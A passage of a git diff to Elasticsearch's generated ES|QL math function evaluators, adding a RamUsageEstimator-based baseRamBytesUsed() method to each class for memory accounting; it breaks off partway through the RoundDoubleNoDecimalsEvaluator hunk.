+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CopySignLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CopySignLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator magnitude;
@@ -59,6 +62,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += magnitude.baseRamBytesUsed();
+    baseRamBytesUsed += sign.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock magnitudeBlock, DoubleBlock signBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CosEvaluator.java
index 5c854d91e9aa8..a25578c375bef 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CosEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CosEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CosEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CosEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CoshEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CoshEvaluator.java
index 8baec8554bb9a..95e6cba70f7d6 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CoshEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CoshEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class CoshEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoshEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpDoubleEvaluator.java
index 6b7fa6df9798e..20b010085ad50 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ExpDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ExpDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpIntEvaluator.java
index 9a46ca17081a0..65af3c3108abb 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpIntEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ExpIntEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ExpIntEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, IntBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpLongEvaluator.java
index 38dcd454cfb38..f2367984f4754 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ExpLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ExpLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpUnsignedLongEvaluator.java
index 57f4b53ce0ba1..bc675f3caae83 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpUnsignedLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ExpUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ExpUnsignedLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/FloorDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/FloorDoubleEvaluator.java
index 41fd18c464367..d7bc6f5b1a4b4 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/FloorDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/FloorDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class FloorDoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(FloorDoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/HypotEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/HypotEvaluator.java
index fed6a8becea4b..d632205efac2f 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/HypotEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/HypotEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class HypotEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(HypotEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator n1;
@@ -57,6 +60,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += n1.baseRamBytesUsed();
+    baseRamBytesUsed += n2.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock n1Block, DoubleBlock n2Block) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10DoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10DoubleEvaluator.java
index ca6f38e573cdf..5150744659d2c 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10DoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10DoubleEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class Log10DoubleEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Log10DoubleEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10IntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10IntEvaluator.java
index bb0963750e4ac..eb3f1f74b018f 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10IntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10IntEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.IntBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class Log10IntEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Log10IntEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, IntBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10LongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10LongEvaluator.java
index 88f518cbe2654..ac6c702f6e467 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10LongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10LongEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class Log10LongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Log10LongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10UnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10UnsignedLongEvaluator.java
index ab2ebdd4f2ec8..1ea14290aa98e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10UnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10UnsignedLongEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class Log10UnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Log10UnsignedLongEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -50,6 +53,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock valBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogConstantEvaluator.java
index 2cdbb295126d9..7ad7a1d4414bf 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogConstantEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class LogConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LogConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator value;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += value.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock valueBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogEvaluator.java
index 50917b21add4d..ab7705c2dcf79 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class LogEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LogEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator base;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += base.baseRamBytesUsed();
+    baseRamBytesUsed += value.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock baseBlock, DoubleBlock valueBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/PowEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/PowEvaluator.java
index 9bf553632a98e..c784090c77045 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/PowEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/PowEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
*/ public final class PowEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(PowEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator base; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += base.baseRamBytesUsed(); + baseRamBytesUsed += exponent.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock baseBlock, DoubleBlock exponentBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleEvaluator.java index cebb54ee59cc5..b3ebab75d9aae 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += decimals.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock, LongBlock decimalsBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleNoDecimalsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleNoDecimalsEvaluator.java index d81d10e1519b9..c8be0cfcef8e7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleNoDecimalsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundDoubleNoDecimalsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. 
